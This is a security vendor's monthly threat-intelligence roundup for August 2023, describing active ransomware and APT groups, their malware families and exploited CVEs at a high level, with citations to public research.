August 2023: Key Threat Actors, Malware and Exploited Vulnerabilities

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, we aim to provide a comprehensive yet digestible analysis of the evolving threat landscape, including insights into the most targeted and at-risk sectors, industries, and regions by cybercriminals in the wild.

Our research is conducted throughout the entire month, utilizing a diverse range of resources that span across threat intelligence and malware dump platforms, blogs, exploit databases, sandboxes, and network data query results. We draw upon this wealth of information to provide you with a holistic understanding of the cyber threat environment, with a particular focus on dissecting malware campaigns, attack campaigns conducted by threat actors and advanced persistent threat (APT) groups, and new malware samples observed in the wild.

By following our monthly threat report, you'll be able to ascertain which threat actors or malware could potentially impact your sector, gauge if your country is being specifically targeted, and understand if there is a surge in threat activity correlated with geopolitical events or state-backed actions. 

Executive Summary

• August 2023 experienced substantial increase in cyber threats, with the most active threat actors being Lazarus APT ([1], [2]), Cuba Ransomware Gang [3], Akira Ransomware Gang [4], MoustachedBouncer [5], and NoEscape Ransomware Group ([6], [7], [8]).

• All these actors caused significant disruptions to businesses and critical infrastructure. For instance, the Akira Ransomware Gang disrupted global entities by stealing 85 GB of data from the Belt Railway Company of Chicago [4], and the NoEscape Ransomware Group notably disrupted the German Federal Bar Association ([6], [7], [8]).

• In terms of malware, August 2023 saw the active use of  BUGHATCH and BURNTCIGAR malware, deployed by Cuba Ransomware Gang [3], and new malware variants Disco and NightClub utilized by MoustachedBouncer [5]. These malware attacks primarily targeted North American, Latin American, and Eastern European regions. 

• Additionally, QuiteRAT and CollectionRAT were employed by the Lazarus APT group ([1], [2]), indicating their development and modification of tools for effective attacks.

• August also witnessed the exploitation of several vulnerabilities. CVE-2021-33764 was exploited by Spacecolon Toolset and Scarab Ransomware [9], while CVE-2022-27926 was targeted by phishing campaigns and the MoustachedBouncer Cyber Espionage Group [5]. Additionally, CVE-2023-35078, CVE-2023-3519, and CVE-2023-3467 were exploited by various APT groups ([10], [11]) and 8Base Ransomware [12].

Top Five Most Active Threat Actors in July

The surge in cyber threats in August 2023 is alarming.

1. Lazarus APT: The Most Notorious Cyber Threat Actor of August 2023

In August, the Lazarus APT group, a North Korean state-sponsored actor, remained highly active, targeting internet backbone infrastructure and healthcare entities in Europe and the United States [1]. 

The Lazarus APT group exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to deploy a new malware, QuiteRAT, just five days after the exploit PoCs were publicly disclosed [2]. This malware has similar capabilities to their better-known MagicRAT but is significantly smaller and more complex due to its construction on the Qt framework. This campaign marks the third in less than a year where Lazarus Group reused the same infrastructure. Their focus on Europe and the U.S. and the exploitation of a critical vulnerability (Kenna risk score of 100 out of 100) indicate a highly strategic and targeted approach. Despite the evolution of their malware arsenal with QuiteRAT, their methods of compromising networks via known vulnerabilities and their targeting of critical infrastructure remain consistent, highlighting the ongoing threat posed by this advanced persistent threat (APT) actor.

2. Cuba Ransomware: Lighting Up Networks with BURNTCIGAR and BUGHATCH Exploits

In August 2023, the Cuba ransomware gang exhibited significant activity by strategically targeting crucial sectors in the U.S. and Latin America, notably the critical infrastructure and IT integration organizations [3].  

They not only incorporated new malware like BURNTCIGAR, which terminates processes at the kernel level, and BUGHATCH, a web shell and backdoor, but also started exploiting a novel vulnerability, CVE-2023-27532, in the Veeam Backup & Replication software, while continuing to exploit CVE-2020-1472 (NetLogon). This strategic update in their tactics, techniques, and procedures (TTPs) is aimed at optimizing execution, impeding detection and analysis, and maximizing impact. The group persistently recycled network infrastructure and used a core set of TTPs, subtly modifying them from one campaign to another. They also operated a leak site on the dark web, listing alleged victims and stolen data, and their victim selection remained predominantly Western-based (or allied), democratic, anglophone countries. This, coupled with linguistic clues and the avoidance of systems with Russian language or keyboard layout, indicates a probable Russian-speaking origin of the threat actors.

3. Akira Ransomware Gang: Rails Held Ransom

In August 2023, the cybercrime landscape witnessed the audacious activities of the Akira ransomware group [4], which targeted several high-profile entities, including the largest switching and terminal railroad in the United States, the Belt Railway Company of Chicago. 

The attack involved the theft of 85 GB of data, as claimed by the Akira ransomware gang on its leak site, despite the company's recent efforts to bolster its cybersecurity posture in compliance with new TSA directives. The incident prompted an investigation by federal law enforcement and a leading cybersecurity firm, although the company maintained that its operations remained unaffected. This attack underscored the growing threat posed by the Akira ransomware group, which emerged in March 2023 and rapidly amassed a string of compromises across various sectors worldwide, from local governments and educational institutions to financial services and music divisions. The targeting of critical infrastructure, such as railroads, highlighted the group's capacity and intent to disrupt key services, amidst a backdrop of escalating cyberthreats from nation-states like Russia, and the broader surge in cyberattacks on railway giants globally.

4. MoustachedBouncer: Disco Daze - The Nightclub Malware Targeting Diplomats in Belarus

In August 2023, the MoustachedBouncer threat group was notably active, targeting foreign diplomats in Belarus. This group exploited the CVE-2022-27926 vulnerability as an initial attack vector, deploying a sophisticated malware suite comprising two main components: 'Disco' and 'Nightclub [5]'. 

'Disco' was primarily used to establish a foothold in the victim's network, while 'Nightclub' facilitated lateral movement and data exfiltration. MoustachedBouncer's activities indicated a well-coordinated and persistent effort to gather intelligence, revealing their advanced capabilities and strategic interests. Their attack campaign illustrated a marked evolution in their tactics, techniques, and procedures (TTPs), reflecting a growing sophistication and a continuous effort to enhance their operational security and evade detection. The targeting of foreign diplomats in Belarus underscores the group's focus on high-value targets and suggests a geopolitical motivation behind their cyber espionage activities.

5. NoEscape Ransomware: An Escalating Global Threat to Multiple Sectors

In August 2023, the NoEscape ransomware group, also known as N0_Esc4pe, intensified its cyber-attack activities, targeting key sectors globally [6]. 

One notable attack was on the German Federal Bar Association (BRAK), an umbrella organization for lawyers, wherein the group encrypted the mail server and exfiltrated 160 gigabytes of data, causing significant disruptions. This attack followed a series of malicious activities by the group, who had previously forced Hawai'i Community College to pay a ransom [7], and targeted a Belgian hospital, a US manufacturing company, and a Dutch manufacturing company [8]. The ransomware used by NoEscape, written in C++, is distinctive as it is not based on previous or stolen source codes. Their activity in August underscores their evolving capabilities and increasing threat to various sectors worldwide. This trend highlights the necessity for enhanced cybersecurity measures and vigilance across all industries to mitigate the risks posed by the rapidly evolving tactics of the NoEscape Ransomware Group.

Top Most Active Malware in August 

Here are the four most actively used malware in August 2023.

• BUGHATCH Malware: Cuba Ransomware's Latest Threat to US and Latin America

In August 2023, Cuba Ransomware (a.k.a COLDDRAW or Fidel Ransomware) was busy with deploying new tools and malware to target the critical infrastructure sector in the North American region and an IT Integrator giant in Latin America [3]. 

The group employed the BUGHATCH malware and a variety of other tools, including the Cobalt Strike Beacon, netpingall.exe, and built-in utilities such as ping.exe, cmd.exe, net.exe, and PSexec, which were utilized for various tasks including network discovery, lateral movement, privilege escalation, and establishing C2 communications. A notable development was the group's first-time exploitation of the CVE-2023-27532 vulnerability in the Veeam Backup & Replication software, in addition to the previously exploited CVE-2020-1472 (ZeroLogon) vulnerability. The group also recycled network infrastructure and subtly modified their TTPs, adopting readily available components to upgrade their toolset. This strategic evolution, combined with the targeted regions, underscores the group's adaptability and persistent threat in the global cyber landscape.

• Introducing Disco and NightClub: The Latest Malware Additions to MoustachedBouncer's Arsenal

In August 2023, the cyber-espionage group "MoustachedBouncer" was notably active, employing two sophisticated malware families, "Disco" and "NightClub," to conduct a series of targeted attacks [5]. 

The "Disco" malware acted as a dropper, delivering the initial payload while creating scheduled tasks that acted as reverse shells, whereas "NightClub" was a fully modular C++ implant used for spying activities, and communicated with the Command and Control (C&C) servers via emails. Additional spying capabilities could be added to "NightClub" by delivering modules via email. The group primarily targeted Eastern European regions, particularly governmental institutions and critical infrastructure sectors. Their operations demonstrated a high level of sophistication, using a combination of newly developed tools, advanced techniques such as tampering with HTTPS traffic, and leveraging existing malware frameworks. This indicated a high level of technical expertise and resources, highlighting the continued threat posed by "MoustachedBouncer" to governments and organizations in the targeted region.

• Unmasking Lazarus APT: The Emergence of Quite RAT and CollectionRAT

The Lazarus Group, a well-known North Korean state-sponsored APT (Advanced Persistent Threat) group, is actively updating its arsenal with newly discovered remote access trojans (RATs), QuiteRAT and CollectionRAT [1]. 

QuiteRAT seems to be a more streamlined and easily deployable version of the previously known MagicRAT, demonstrating similar functionalities. Additionally, CollectionRAT, a malware equipped with standard features like executing arbitrary commands and managing files on infected systems, is apparently connected to Jupiter/EarlyRAT, previously attributed to Andariel, a subgroup within Lazarus. This indicates that the group is not only developing new malicious tools but also modifying and repurposing older ones to ensure the effectiveness and stealthiness of their attacks. Furthermore, their adoption of open-source tools, such as the DeimosC2 framework and a malicious version of PuTTY's Plink utility, indicates a strategic shift in tactics and an effort to hinder analysis.

Top CVE’s Exploited in August

Here are the top most targeted vulnerabilities in August, with respective CVE IDs, as well as the malware and tools used in their exploitation campaign.

The increasing number of public-facing products facing exploitation underscores the critical importance of swift and comprehensive cybersecurity measures to safeguard systems from attackers. Patch management, threat detection, and robust incident response strategies become paramount to prevent such relentless attacks. 

Organizations must prioritize proactive security practices to protect their networks and valuable data from the ever-evolving tactics of threat actors.

References

[1] A. Malhotra, “Lazarus Group’s infrastructure reuse leads to discovery of new malware,” Cisco Talos Blog, Aug. 24, 2023. Available: https://blog.talosintelligence.com/lazarus-collectionrat/. [Accessed: Aug. 28, 2023]

[2] A. Malhotra, “Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT,” Cisco Talos Blog, Aug. 24, 2023. Available: https://blog.talosintelligence.com/lazarus-quiterat/. [Accessed: Aug. 28, 2023]

[3] “Cuba Ransomware Deploys New Tools: Targets Critical Infrastructure Sector in the U.S. and IT Integrator in Latin America,” BlackBerry, Aug. 17, 2023. Available: https://blogs.blackberry.com/en/2023/08/cuba-ransomware-deploys-new-tools-targets-critical-infrastructure-sector-in-the-usa-and-it-integrator-in-latin-america. [Accessed: Aug. 28, 2023]

[4] “Largest switching and terminal railroad in US investigating ransomware data theft.” Available: https://therecord.media/belt-railway-chicago-ransomware-data-theft-akira. [Accessed: Aug. 28, 2023]

[5] A. Goretsky, “MoustachedBouncer: Espionage against foreign diplomats in Belarus.” Available: https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/. [Accessed: Aug. 28, 2023]

[6] “Germany’s national bar association investigating ransomware attack.” Available: https://therecord.media/german-national-bar-association-investigating-cyberattack. [Accessed: Aug. 28, 2023]

[7] “Hawaiʻi Community College pays ransom after attackers steal personal info of 28,000 people.” Available: https://therecord.media/hawaii-community-college-pays-ransom-after-hack-compromises-data. [Accessed: Aug. 28, 2023]

[8] “Ransomware hackers paid in HCC case,” West Hawaii Today, Aug. 10, 2023. Available: https://www.westhawaiitoday.com/2023/08/10/hawaii-news/ransomware-hackers-paid-in-hcc-case/. [Accessed: Aug. 28, 2023]

[9] J. Souček, “Scarabs colon-izing vulnerable servers.” Available: https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/. [Accessed: Aug. 28, 2023]

[10] “Threat Actors Exploiting Ivanti EPMM Vulnerabilities,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a. [Accessed: Aug. 28, 2023]

[11] Unit, “Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers,” Unit 42, Jul. 28, 2023. Available: https://unit42.paloaltonetworks.com/threat-brief-citrix-cve-2023-3519/. [Accessed: Aug. 28, 2023]

[12] “AlienVault - Open Threat Exchange,” AlienVault Open Threat Exchange. Available: https://otx.alienvault.com/pulse/64c3b8a568674f257291b042. [Accessed: Aug. 28, 2023]

[13] “CVE - CVE-2022-27926.” Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27926#:~:text=A%20reflected%20cross%2Dsite%20scripting,or%20HTML%20via%20request%20parameters. [Accessed: Aug. 28, 2023]

[14] V. Šperka, “Mass-spreading campaign targeting Zimbra users.” Available: https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/. [Accessed: Aug. 28, 2023]

[15] D. Burton, “CVE-2023-35078: Critical API Access Vulnerability in Ivanti Endpoint Manager Mobile,” Rapid7, Jul. 26, 2023. Available: https://www.rapid7.com/blog/post/2023/07/26/etr-cve-2023-35078-critical-api-access-vulnerability-ivanti-in-endpoint-manager-mobile/. [Accessed: Aug. 28, 2023]